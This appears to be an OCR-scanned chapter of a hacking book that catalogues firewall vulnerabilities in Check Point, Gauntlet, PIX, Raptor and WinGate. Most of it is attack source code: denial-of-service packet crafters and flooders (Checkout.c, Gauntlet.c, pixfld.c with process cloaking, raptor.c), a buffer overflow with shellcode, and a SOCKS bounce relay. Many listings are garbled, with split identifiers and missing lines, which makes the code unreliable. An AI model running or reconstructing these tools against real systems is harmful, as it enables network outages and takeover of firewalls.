Liabilities
Complete Denial-of-Service Attack
Synopsis: The firewall crashes when it detects packets coming from a different MAC address with the same IP address as itself.
Hack State: System crash. Vulnerabilities: 3x, 4x
Breach: The firewall crashes when it detects packets coming from a different MAC address with the same IP address as itself. With Checkout.c by hacker guru lore, the program simply sends a few spoofed UDP packets to the target firewall interface.
Checkout.c
#define __BSD_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#define TRUE 1
#define FALSE 0
#define ERR -1
typedef u_long ip_t;
typedef long sock_t;
typedef struct ip iph_t;
typedef struct udphdr udph_t;
typedef u_short port_t;
#define IP_SIZE (sizeof(iph_t))
#define UDP_SIZE (sizeof(udph_t))
#define PSIZE (IP_SIZE + UDP_SIZE)
#define IP_OFF (0)
#define UDP_OFF (IP_OFF + IP_SIZE)
void usage _P ((u_char *));
u_short checksum _P ((u_short *, int));
int main (int argc, char * * argv) {
ip_t victim; sock_t fd; iph_t * ip_ptr; udph_t * udp_ptr; u_char packet[PSIZE]; u_char * yes = "1"; struct sockaddr_in sa; port_t aport; u_long packets;
if (argc < 3) {
usage (argv[0]);
}
fprintf(stderr, "\n*** CheckPoint IP Firewall DoS\n"); fprintf(stderr, "*** Bug discovered by: antipent rtodd@antipentium.com>\n");
fprintf(stderr, Code by: lore
r
if ((victim = inet_addr(argv[1])) == ERR)
{
fprintf(stderr, "Bad IP address '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
else if (!(packets = atoi(argv[2]))) {
fprintf(stderr, "You should send at least 1 packet\n");
exit(EXIT_FAILURE);
}
else if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR) {
fprintf(stderr, "Couldn't create raw socket: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
else if ((setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &yes, 1)) == ERR
)
fprintf(stderr, "Couldn't set socket options: %s\n", strerror(e rrno));
exit(EXIT_FAILURE);
}
srand((unsigned)time(NULL));
if (argc > 3) {
aport = htons(atoi(argv[3]));
}
else {
aport = htons(rand() % 65535 + 1);
}
fprintf(stderr, "Sending packets: ");
while (packets-- ) {
memset(packet, 0, PSIZE);
ip_ptr = (iph_t *)(packet + IP_OFF); udp_ptr = (udph_t *)(packet + UDP_OFF);
ip
ptr
->ip_
hl =
5;
ip
ptr
->ip
v =
4;
ip
ptr
->ip_
tos
= 0;
ip
ptr
->ip_
len
= PSIZE;
ip
ptr
->ip_
id =
= 1234;
ip
ptr
->ip_
off
= 0;
ip
ptr
->ip_
ttl
= 255;
ip
ptr
->ip
p =
IPPROTO UDP;
ip
ptr
->ip_
sum
= 0;
ip
ptr
->ip_
src.
s_addr = victim;
ip
ptr
->ip_
dst.
s_addr = victim;
udp_ptr->source = htons(rand() % 65535 + 1); udp_ptr->dest = aport; udp_ptr->len = htons(UDP_SIZE);
udp_ptr->check = checksum((u_short *)ip_ptr, PSIZE);
sa.sin_port = htons(aport); sa.sin_family = AF_INET; sa.sin_addr.s_addr = victim;
if ((sendto(fd,
packet,
PSIZE,
0,
(struct sockaddr *)&sa, sizeof(struct sockaddr_in))) == ERR)
fprintf(stderr, "Couldn't send packet: %s\n",
strerror(errno)); close(fd); exit(EXIT_FAILURE);
}
fprintf(stderr, ".");
}
fprintf(stderr, "\n"); close(fd);
return (EXIT_SUCCESS);
}
void usage (u_char * pname)
{
fprintf(stderr, "Usage: %s
);
exit(EXIT_SUCCESS);
}
u_short checksum (u_short *addr, int len)
{
register int nleft = len; register int sum = 0; u_short answer = 0;
while (nleft > 1) { sum += *addr++; nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr; sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer);
}
/* EOF */ Severe Congestion
Synopsis: This breach allows a remote attacker to lock up the firewall with 100 percent CPU utilization.
Hack State: Severe congestion; system crash.
Vulnerabilities: All versions.
Breach: FW-1 does not inspect nor log fragmented packets until the packet has been completely reassembled. As a result, by sending thousands of unrelated fragmented packets to a target interface, remote attackers can render the system inoperable.
Gauntlet
Undoubtedly, firewalls are the most difficult security defense mechanisms to configure correctly. Although most vulnerability assessments normally find flaws in firewall configurations, Gauntlet Firewall by PGP Security, a Network Associates company (www.pgp.com/asp_set/products/tns/gauntlet.asp) has fewer than most. Offering inspection through almost the entire protocol stack, Gauntlet's proxy modules ward off unauthorized visitors with the speed of packet filtering, using Network Associates' patent-pending Adaptive Proxy technology. Among other praise, Gauntlet has been given excellent reviews for its configuration Firewall Manager software module (see Figure 11.1).
Denial-of-Service Attack
Synopsis: This breach allows a remote attacker to lock up the firewall. Hack State: System crash.
Vulnerabilities: Version 5.5.
Breach: If an attacker knows an IP address that will be routed through a Gauntlet Firewall, he or she can remotely lock up the firewall so that one packet will disable progression on Sparcs, and three to five packets will disable Ctrl-Alt-Del on BSDI.
Gauntlet.c
#include
int main(int argc, char **argv)
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip =
u_long *problem = NULL; u_char *packet = NULL; int sock, c, len = 0; long acx, count = 1; struct icmp *icmp; struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */ u_char data[] = { 137} ;
int data_len = sizeof(data);
printf("Written by Mike Frantzen...
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 's':
case 'D':
case 'S':
case 'l': case 'c':
default:
break;
src_ip = libnet_name_resolve(optarg break;
ins_dst_ip = name_resolve(optarg, 1 break;
ins_src_ip = name_resolve(optarg, 1
= atoi(optarg);
break; data_len break;
if ( (count = atol(optarg)) < 1) count = 1;
break;
printf("Don't understand option.\n" exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d
IP>]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1)
f
printf("\t\t[-S
printf("\t\t[-l ]\t[-c <# to send>]\n"); exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip; if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: "); exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { perror("socket: "); exit(-1);
}
/* 8 is the length of the ICMP header with the problem fiel
d */
r */
icmp->icmp_type = ICMP_PARAMPROB; icmp -
>icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into
it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header
*/
ip->ip_v = 0x4; /* IPV4 */
ip->ip_src.s_addr = ins_src_ip; ip->ip_dst.s_addr = ins_dst_ip; /* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len); /* I hate checksumming. Spent a day trying to get it to wor
k in
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_l
/* Bah... See above comment... . */
libnet_do_checksum(packet, IPPROTO_ICMP, len); printf("Sending %li packets", count); for (acx = 0; acx < count; acx++) {
if( libnet_write_ip(sock, packet, len + IP_H) < (len + I
perror("write_ip: "); else printf(".");
}
printf("\n\n");
return( 0 );
}
Subjective Code Execution via Buffer Overflow
Synopsis: This Gauntlet breach enables a remote attacker to cause the firewall to execute arbitrary code.
Hack State: Unauthorized code execution.
Vulnerabilities: Versions 4.1, 4.2, 5.0, and 5.5, depending on the configuration.
Breach: A buffer overflow exists in the version of Mattel's Cyber Patrol software integrated to Network Associates' Gauntlet firewall, versions 4.1, 4.2, 5.0, and 5.5. Due to the manner in which Cyber Patrol was integrated, a vulnerability was introduced that could allow a remote attacker to gain root access on the firewall or to execute arbitrary commands on the firewall. By default, Cyber Patrol
622
is installed on Gauntlet installations, and runs for 30 days. After that period, it is disabled. During this 30-day period, the firewall is susceptible to attack. Because the filtering software is externally accessible, users not on the internal network may also be able to exploit the vulnerability. The code was written to run a test file called /bin/zz, so you need to create one in /bin on the firewall and chmod it to 700. Inside the zz file, you should have it do something that leaves you a log. Here is a simple example:
#include
char data[3 64]; main() { int i;
char shelloutput[8 0]; unsigned char shell[] =
"\x90"
"\xeb\x1f\x5e\x31\xc0\x8 9\x4 6\xf5\x8 8\x4 6\xfa\x8 9\x4 6\x0c\x8 9\x7 6" "\x0 8\x50\x8d\x5e\x08\x53\x56\x5 6\xb0\x3b\x9a\xff\xff\xff\xff\x0 7" "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";
for(i=0;i<264;i++)
data[i]=0x90;
data[i]=0x30;i++;
data[i]=0x9b;i++;
data[i]=0xbf;i++;
data[i]=0xef;i++;
data[i] = 0x00;
for (i=0; i= argc )
print_usage (); destination = in_aton (argv[optind]); #ifdef DEBUG
fprintf (stderr, "Wait time = %d\n", wait_time); fprintf (stderr, "Maximum packet size = %d\n", packet_size); fprintf (stderr, "Packets count = %d\n", packet_count); fprintf (stderr, "Destination = %08x\n", destination); fprintf (stderr, "Gateway = %08x\n", gateway);
if (tflag)
fprintf (stderr, "TCP option enabled\n");
if (uflag)
fprintf (stderr, "UDP option enabled\n");
#endif
}
void init_raw_socket()
{
unsigned int sndlen, ssndlen, optlen = sizeof (ssndlen);
int fl;
if ( (socket_fd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0
) {
perror ("ipbomb : socket "); exit (1);
}
#ifdef __linux__
sndlen = packet_size + 128 + 1 + sizeof (struct sk_buff);
#else
sndlen = packet_size; #endif
if ( setsockopt (socket_fd, SOL_SOCKET, SO_SNDBUF, (char *) &s ndlen,
sizeof (sndlen) ) ) {
perror ("ipbomb : setsockopt (... , ... , SO_SNDBUF,... ) "); exit (1);
}
if ( getsockopt (socket_fd, SOL_SOCKET, SO_SNDBUF, (char *) &s sndlen,
&optlen) ) {
perror ("ipbomb : getsockopt (. , . , SO_SNDBUF,. ) "); exit (1);
}
if ( ssndlen != sndlen ) {
fprintf (stderr, "ipbomb: maximum packet size to big.\n")
r
exit (1);
}
fl = fcntl ( socket_fd, F_GETFL, 0);
fl |= O_NONBLOCK;
fcntl ( socket_fd, F_SETFL, fl);
}
void close_raw_socket()
{
close (socket_fd);
void send_packet( char *bomb, int len )
{
int i;
i = sendto (socket_fd, bomb, len, 0, &dest, sizeof (dest));
/*
if ( i != packet_size ) {
perror ("ipbomb : sendto "); exit (1);
}
*/
}
void generate_packet( char *bomb )
{
struct ip * iph = (struct ip *) bomb; unsigned int i;
unsigned int len = packet_size * (rand() & 0xffff) >> 16 ;
assert ( len < packet_size ); /* Options needed to be correct */ iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_sum = 0; iph->ip_len = htons(len);
/* Random options */
#define SET_RAND(_a) iph->_a = rand() & ((1 << (sizeof (iph-
>_a) * 8))
- 1)
SET_RAND(ip_tos); SET_RAND(ip_id); SET_RAND(ip_ttl); SET_RAND(ip_off); SET_RAND(ip_p); #undef SET_RAND
iph->ip_src.s_addr = rand();
iph->ip_dst.s_addr = destination ? destination : rand(); for ( i = sizeof (struct ip); i < len; i++) bomb[i] = rand() & 255;
send_packet(bomb, len);
}
void main (int argc, char *argv[])
{
int i;
char * bomb;
struct sockaddr_in * inet_dest = (struct sockaddr_in *) & dest
r
srand (time (NULL));
get_options (argc, argv); bzero (&dest, sizeof (dest)); inet_dest->sin_family = AF_INET; inet_dest->sin_addr.s_addr = gateway;
if ( (bomb = malloc(packet_size)) == NULL) { perror ("ipbomber: malloc"); exit(1);
}
init_raw_socket();
for ( i = 0; i < packet_count; i++ ) { generate_packet (bomb) ;
}
close_raw_socket();
}
PIX
The PIX, offered by Cisco Systems, Inc. (www.cisco.com), delivers strong security in another easy-to-install, integrated hardware platform. Providing full firewall security protection, the PIX firewalls use a non-UNIX, secure, real-time, embedded system. The PIX delivers impressive performance of up to 256,000 simultaneous connections, more than 6,500 connections per second, and nearly 170 Mbps throughput. With a command-line interface or graphical administration manager, the PIX permits easy configuration and management of single or multiple PIX firewalls, each protecting multiple networks (including Token Ring), from a single location. The PIX can support six interfaces, including network address translation (NAT).
Liabilities
The most current PIX vulnerability secret pertains to the way the PIX firewall keeps connection state routing tables. Basically, a remote attacker can launch a DoS attack against a DMZ area of the PIX, thereby enabling hackers to reset the entire routing table, effectively blocking all communication from any internal interfaces to external interfaces, and vice versa (see pixfld.c).
pixfld.c
/* [Defines] */
#define Port_Max 65534
#define Packet_Max 1023
#define Frequency_Max 300
#define Default_Fork 0
#define Default_Stealth "(nfsiod)"
/* Color Pallete */
#define
B
"\033[1;
30m
#define
R
"\033[1;
31m
#define
G
"\033[1;
32m
#define
Y
"\033[1;
33m
#define
U
"\033[1;
34m
#define
M
"\033[1;
35m
#define
C
"\033[1;
36m
#define
W
"\033[1;
37m
#define
DR
"\033[0;
31m
#define
DG
"\033[0;
32m
#define DY "\033[0;33m" #define DU "\033[0;34m" #define DM "\033[0;35m" #define DC "\033[0;36m" #define DW "\033[0;37m"
#define RESTORE "\ 33[0;0m"
#define CLEAR "\033[0;0H\033[J"
/* [Includes] */
#include
/* [Option Parsing] */
struct sockaddr_in dstaddr;
unsigned long dst;
struct udphdr *udp; struct iphdr *ip;
char *target; char *srchost; char *stealth;
int dstport = 0;
int srcport = 0; int numpacks = 0; int psize = 0; int wait = 0; int forknum = 0;
/* [Usage] */
void usage(char *pname)
{
printf(" \n\n%sUsage%s %s: %s[%sarguements%s] %s<%sTarget
Ip%s>%s\n\n",DG,R,pname,DM,U,DM,DM,U,DM,RESTORE);
printf("%sOption Description Def
ault
Value\n\n",W,RESTORE);
printf("%s-%ss %s<%sSource IP %s> %s: %sPacket Origin %s[%s Random %s ] \ n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE);
printf("%s-
%sn %s<%sPacket Num %s> %s: %sLimit of Sent Datagrams
%s[%s Unlimited %s ] \ n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE);
printf("%s-%sp %s<%sPacket Size%s> %s: %sDatagram Size %s[%s 1 - %d bytes%s ]
\n",DR,DU,W,DC,W,DW,B,W,DC,Packet_Max,W,RESTORE);
printf("%s-%sd %s<%sTarget Port%s> %s: %sDestination Port
%s[%s Random %s ] \ n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE);
printf("%s -%so %s<%sSource Port%s> %s: %sSource Port %s[%s Random %s ] \ n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE);
printf("%s-%sw %s<%sFrequency %s> %s: %sDelay Between Each
Packet %s[%s 0 - %d ms%s ]
.\n",DR,DU,W,DC,W,DW,B,W,DC,Frequency_Max,W,RESTORE);
printf("%s-%sf %s<%sFork Number%s> %s: %sNo. of Times Backgrounded %s[%s 0 Times %s ]%s \n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE);
printf("%s-%sx %s<%sStealth %s> %s: %sMask Process As
2~ o T 9- o 9- o
o o |_ o o o o
%s]%s",DR,DU,W,DC,W,DW,B,W,DC,Default_Stealth,W,RESTORE); printf("\n\n"); exit(EXIT_SUCCESS);
}
/* [In chksum with some mods] */
unsigned short in_cksum(addr, len) u_short *addr; int len; {
register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0;
while (nleft > 1) {
sum += *w++;
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w; sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum;
return (answer);
/* Resolve Functions */
unsigned long resolve(char *cp) {
struct hostent *hp;
hp = gethostbyname(cp); if (!hp) {
printf("[*] Unable to resolve %s\t\n", cp); exit(EXIT_FAILURE);
}
return ((unsigned long) hp->h_addr);
}
void resolvedest(void)
{
struct hostent *host;
memset(&dstaddr, 0, sizeof(struct sockaddr_in)); dstaddr.sin_family = AF_INET; dstaddr.sin_addr.s_addr = inet_addr(target); if (dstaddr.sin_addr.s_addr == -1) { host = gethostbyname(target);
if (host == NULL) {
printf("[*] Unable To resolve %s\t\n", target);
exit(EXIT_FAILURE);
}
dstaddr.sin_family = host->h_addrtype;
memcpy((caddr_t) & dstaddr.sin_addr, host->h_addr, host->h_length); ~ }
memcpy(&dst, (char *) &dstaddr.sin_addr.s_addr, 4);
}
/* Parsing Argz */
void parse_args(int argc, char *argv[])
{
int opt;
while ((opt = getopt(argc, argv, "x:s:d:n:p:w:o:f:")) != -1) switch (opt) { case 's':
srchost = (char *) malloc(strlen(optarg) + 1); strcpy(srchost, optarg); break; case 'x':
stealth = (char *) malloc(strlen(optarg));
strcpy(stealth, optarg); break; case 'd':
dstport = atoi(optarg); break; case 'n':
numpacks = atoi(optarg); break; case 'p':
psize = atoi(optarg); break; case 'w':
wait = atoi(optarg); break; case 'o':
srcport = atoi(optarg); break; case 'f':
forknum = atoi(optarg); break; default: usage(argv[0]);
}
if (!stealth)
stealth = Default_Stealth; if (!forknum)
forknum = Default_Fork; if (!argv[optind]) { printf("\n\n%s[%s*%s]%s Bzzzt .. We need a Place for the Packe
ts to
Go%s\n",DC,W,DC,DR,RESTORE);
exit(EXIT_FAILURE);
}
target = (char *) malloc(strlen(argv[optind])); if (!target) {
printf("\n\n%s[%s*%s]%s Unable to Allocate Required Amount of Memory for Task%s\ n",DC,W,DC,DR,RESTORE); perror("malloc");
exit(EXIT_FAILURE);
}
strcpy(target, argv[optind]);
}
int cloaking(int argc, char *argv[])
{
int x;
for (x = argc-1; x >= 0; x-- )
memset(argv[x], 0, strlen(argv[x])); strcpy(argv[0],stealth);
return(0);
/* [Send Packet] */
char *argv[])
i, unlim = 0, sec_check;
void main(int argc,
{
int q, xx, sen, char *packet;
banner();
if (argc < 2) usage(argv[0]);
parse_args(argc, argv);
cloaking(argc, argv);
resolvedest();
printf("\n\n%s [%s*%s]%s Target Host%s :%s %s%s\n",DC,W,DC,DR,DC,DW,target,RESTORE); if (!srchost)
printf("%s [%s*%s]%s Source Host%s :%s Random%s\n",DC,W,DC,DR,DC,DW,RESTORE); else
printf("%s [%s*%s]%s Source Host%s :%s %s
%s\n",DC,W,DC,DR,DC,DW,srchost,RESTORE);
if (!numpacks)
■ 9- o . t5 o
printf("%s [%s*%s]%s Number%s Infinite%s\n",DC,W,DC,DR,DC,DW,RESTORE); else
■ 9- o . t5 o
printf("%s [%s*%s]%s Number%s %d%s\n",DC,W,DC,DR,DC,DW,numpacks,RESTORE); if (!psize)
:%s 1 - %d
printf("%s [%s*%s]%s Packet Size%s bytes%s\n",DC,W,DC,DR,DC,DW,Packet_Max,RESTORE);
else
printf("%s [%s*%s]%s Packet Size%s :%s %d%s\n",DC,W,DC,DR,DC,DW,psize,RESTORE);
if (!wait)
printf("%s [%s*%s]%s Wait Time%s :%s 0 -
%dms%s\n",DC,W,DC,DR,DC,DW,Frequency_Max,RESTORE); else
printf("%s [%s*%s]%s Wait Time%s :%s
%d%s\n",DC,W,DC,DR,DC,DW,wait,RESTORE);
if (!dstport)
printf("%s [%s*%s]%s Destination Port%s :%s
Random%s\n",DC,W,DC,DR,DC,DW,RESTORE);
else
printf("%s [%s*%s]%s Destination Port%s :%s
%d%s\n",DC,W,DC,DR,DC,DW,dstport,RESTORE);
if (!srcport)
printf("%s [%s*%s]%s Source Port%s :%s Random%s\n",DC,W,DC,DR,DC,DW,RESTORE); else
printf("%s [%s*%s]%s Source Port%s :%s %d%s\n",DC,W,DC,DR,DC,DW,srcport,RESTORE);
printf("%s [%s*%s]%s Backgrounded%s :%s %d%s\n",DC,W,DC,DR,DC,DW,forknum,RESTORE);
if (!stealth)
printf("%s [%s*%s]%s Masked As%s :%s
%s%s\n",DC,W,DC,DR,DC,DW,Default_Stealth,RESTORE);
else
printf("%s [%s*%s]%s Masked As%s :%s
%s%s\n",DC,W,DC,DR,DC,DW,stealth,RESTORE);
if (forknum) { switch(fork()) { case -1:
printf("%s [%s*%s]%s Your OS cant Make the fork() call as we need
it",DC,W,DC,DR,RESTORE);
printf("%s [%s*%s]%s This is usually an indication of something
bad%s",DC,W,DC,DR,RESTORE);
exit(1); case 0: break; default: forknum-- ;
for(xx=0;xx
printf("%s [%s*%s]%s Unable to fork%s\n",DC,W,DC,DR,RESTORE)
r
printf("%s [%s*%s]%s This is usually an indication of someth
ing
bad%s",DC,W,DC,DR,RESTORE); exit(1);
case 0: xx=forknum;
break; default:
if(xx==forknum-1){
printf("%s [%s*%s]%s Process Backgrounded%s\n",DC,W,DC,DR,RESTORE);
exit(0);
}
break;
}
}
}
}
sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
packet = (char *) malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + psize);
ip = (struct iphdr *) packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr)
+
psize);
if (!numpacks) { unlim++; numpacks++;
}
if (srchost && *srchost)
ip->saddr = resolve(srchost); ip->daddr = dst; ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->protocol = IPPROTO_UDP; ip-
>tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + psize);
ip->check = in_cksum(ip, sizeof(struct iphdr));
udp->source = htons(srcport); udp->dest = htons(dstport);
udp->len = htons(sizeof(struct udphdr) + psize); /*
Because we like to be Original Seeding rand() with something
as
unique as time seemed groovy. Lets have a loud Boo for Patt
ern
Loggers.
*/
srand(time(0));
for (i = 0; i < numpacks; (unlim) ? i-- : {
if (!srchost)
ip->saddr = rand(); if (!dstport)
udp->dest = htons(rand()%Port_Max+1); if (!srcport)
udp->source = htons(rand()%Port_Max+1); if (!psize) udp-
>len = htons(sizeof(struct udphdr) + rand()%Packet_Max);
if (sendto(sen, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + psize, 0, (struct sockaddr *) &dstaddr, sizeof(struct sockaddr_in)) == (-1)) { printf("%s[%s*%s]%s Error sending Packet%s",DC,W,DC,DR,RESTORE);
perror("SendPacket");
exit(EXIT_FAILURE);
if (!wait)
usleep(rand()%Frequency_Max); else usleep(wait);
}
}
Raptor
The Axent Raptor Firewall (www.axent.com/raptorfirewall) provides real-time security for internal networks and the Internet, intranets, mobile computing zones, and remote office connections. The Raptor solution was the first to be recognized as an IPSec-certified VPN server for Windows NT. And Secure Computing Magazine reviewers gave the Raptor Firewall for NT 6.5 a perfect overall score of five stars, along with its Best Buy Award, highlighting Raptor Firewall's excellent management console, covering both firewall and VPN; its wide range of flexible proxies; and Checkmark certification. Nevertheless, like most other security defense mechanisms, the Raptor Firewall is vulnerable to remote attacks.
Liabilities
Denial-of-Service Attack
Synopsis: This breach allows a remote attacker to potentially lock up the firewall with a DoS hack. Hack State: System crash.
Vulnerabilities: Raptor 6x, depending on configuration.
Breach: The raptor.c DoS attack is where a nonprogrammed IP option is used in an IP packet and sent to the firewall. The firewall is unable to handle this unknown IP option, causing it to stop responding.
raptor.c
#define _FAVOR_ #include #include #include #include
BSD
#define SRC_IP 10.00.00.01 */
#define TCP_SZ #define IP SZ
#include
htonl(0x0a000001) /*
20 20
#define PAYLOAD_LEN 32 #define OPTSIZE 4 #define LEN (IP_SZ + TCP_SZ + PAYLOAD_LEN + OPTSIZE)
void main(int argc, char *argv[]) {
int checksum(unsigned short *, int); int raw_socket(void);
int write_raw(int, unsigned char *, int);
unsigned long option = htonl(0x44000001); /* Timestamp,
NOP,
END */
unsigned char *p; int s, c; struct ip *ip; struct tcphdr *tcp;
if (argc != 2) {
printf("Quid custodiet ipsos custodes?\n"); printf("Usage: %s
}
p = malloc(1500); memset(p, 0x00, 1500);
if ((s = raw_socket()) < 0) return perror("socket");
ip *) p; = 0x4;
= 0x5 + (OPTSIZE / 4); = 0x32; = htons(LEN); = htons(0xbeef); = 0x0; = 0xff;
= IPPROTO_TCP; = 0;
s_addr = SRC_IP;
s_addr = inet_addr(argv[1]
(p +
htons(80); 0xbeef; 0x12345678; 0x87654321;
5;
TH_ACK | TH_PUSH; htons(8192);
/* Masquerade the packet as part of a legitimate answer *
IP_SZ + OPTSIZE);
tcp->th_sum = 0;
/* Set the IP options */
memcpy((void *) (p + IP_SZ), (void *) &option, OPTSIZE);
c = checksum((unsigned short *) &(ip->ip_src), 8)
+ checksum((unsigned short *) tcp, TCP_SZ + PAYLOAD_LE
N)
+ ntohs(IPPROTO_TCP + TCP_SZ);
while (c >> 16) c = (c & 0xffff) + (c >> 16); tcp->th_sum = ~c;
printf("Sending %s -> ", inet_ntoa(ip->ip_src)); printf("%s \n", inet_ntoa(ip->ip_dst));
if (write_raw(s, p, LEN) != LEN) perror("sendto");
}
int write_raw(int s, unsigned char *p, int len) {
struct ip *ip = (struct ip *) p; struct tcphdr *tcp; struct sockaddr_in sin;
tcp = (struct tcphdr *) (ip + ip->ip_hl * 4);
memset(&sin, 0x00, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip->ip_dst.s_addr;
sin.sin_port = tcp->th_sport;
return (sendto(s, p, len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr_in)));
}
int raw_socket(void) {
int s, o = 1;
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
return -1;
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (void *) &o,
sizeof(o)) < 0)
return (-1);
return (s);
}
int checksum(unsigned short *c, int len) {
int sum = 0; int left = len;
while (left > 1) {
sum += *c++;
left -= 2;
}
if (left)
sum += *c & 0xff;
return (sum);
}
/*###EOF####*/
WinGate
WinGate (www.wingate.net) is a proxy server firewall software package that allows networked computers to simultaneously share an Internet connection while serving as a firewall, prohibiting intruders from accessing the local network. WinGate works by routing Internet traffic and communications between the local network (home or corporate) and the Internet, and by automatically assigning required network addresses to each networked computer. The Internet connection shared by WinGate can be dial-up modem, ISDN, xDSL, cable modem, satellite connection, or even dedicated T1 circuits. WinGate defenses are known for their poor configurations: Instead of limiting access to people from the local network, they have opened the way for anything from IP spoofing to full-scale DoS abuse (see wingatebounce.c and wingatecrash.c), often referred to as ''open WinGates."
Liabilities
Denial-of-Service Attack
Synopsis: These vulnerability attacks allow a remote attacker to potentially lock up the firewall with DoS hacks.
Hack State: System crash. Vulnerabilities: All flavors. Breach: wingatebounce.c. wingatebounce.c
#include #include #include #include #include #include
#define BUFSIZE 512
#define SOCKSPORT 1080
const char portclosed[] = "socks: Port closed/Permission denyed/Something went wrong\n";
int
main (int argc, char **argv) {
int listensocket, insocket, outsocket; short listenport, destport; struct hostent *socks_he, *dest_he; struct sockaddr_in listen_sa, socks_sa; int sopts = 1, maxfd; char buffer[BUFSIZE]; int length; fd_set rfds;
if (argc != 5) {
printf ("Usage: %s locallistenport sockshost desthost destpor
t\n",
argv[0]);
exit (1);
}
if ((socks_he = gethostbyname (argv[2])) == NULL) {
herror ("gethostbyname"); exit (1);
}
memset (&socks_sa, 0, sizeof (struct sockaddr_in)); memcpy (&socks_sa.sin_addr.s_addr, socks_he->h_addr_list [0], socks_he->h_length);
if ((dest_he = gethostbyname (argv[3])) == NULL) {
herror ("gethostbyname"); exit (1);
}
/* no need for errorchecking. only fools mess these up */ listenport = atoi (argv[1]); destport = atoi (argv[4]);
listensocket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt (listensocket, SOL_SOCKET, SO_REUSEADDR, &sopts, sizeo
f
(int));
memset (&listen_sa, 0, sizeof (struct sockaddr_in));
listen_sa.sin_port = htons (listenport); listen_sa.sin_addr.s_addr = htonl (INADDR_ANY);
socks_sa.sin_port = htons (SOCKSPORT);
if ((bind (listensocket, (struct sockaddr *) &listen_sa, sizeof (struct sockaddr_in))) == -1)
perror ("bind"); exit (1);
}
if ((listen (listens ocket, 1)) == -1)
{
perror ("listen"); exit (1);
}
/* background stuff */ switch (fork ())
{
case -1:
perror ("fork");
exit (1);
break; case 0:
#ifndef MYDEBUG
close (STDIN_FILENO); close (STDOUT_FILENO); close (STDERR_FILENO);
#endif
if (setsid () == -1) {
perror ("setsid"); exit (1);
}
break; default: return 0;
}
insocket = accept (listensocket, NULL, 0); if (insocket == -1)
{
perror ("accept"); exit (1);
}
close (listensocket);
outsocket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ((connect (outsocket, (struct sockaddr *) &socks_sa, sizeof (s truct
sockaddr_in))) == -1)
{
perror ("connect"); exit (1);
}
snprintf (buffer, 8192, "\ x04\ x01%c%c%c%c%c%c", (destport >> 8)
&
0xFF, destport & 0xFF, /* <-- port */
(char) dest_he->h_addr[0], (char) dest_he>h_addr[1], (char)
dest_he->h_addr[2], (char) dest_he->h_addr[3]); /* <-- ip# */
#ifdef MYDEBUG
for (length = 0; length < 8; length++)
printf ("%02X:", (unsigned char) buffer[length]);
printf ("\n");
for (length = 0; length < 8; length++)
if (buffer[length] > 'A' && buffer[length] < 'z')
printf (" %c:", (unsigned char) buffer[length]); else
printf (" *:"); printf ("\n");
#endif
/* errorchecking sucks */
send (outsocket, buffer, 9, 0);
recv (outsocket, buffer, 8, 0);
/* handle errors etc */
if (buffer[1] == 0x5B)
send (insocket, portclosed, sizeof (portclosed), 0);
#ifdef MYDEBUG
for (length = 0; length < 8; length++)
printf ("%02X:", (unsigned char) buffer[length]);
printf ("\n");
for (length = 0; length < 8; length++)
if (buffer[length] > 'A' && buffer[length] < 'z')
printf (" %c:", (unsigned char) buffer[length]); else
printf (" *:"); printf ("\n");
#endif
maxfd = insocket>outsocket?insocket:outsocket;
while (1)
{
FD_ZERO (&rfds);
FD_SET (insocket, &rfds);
FD_SET (outsocket, &rfds);
select (maxfd+1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (insocket, &rfds))
{
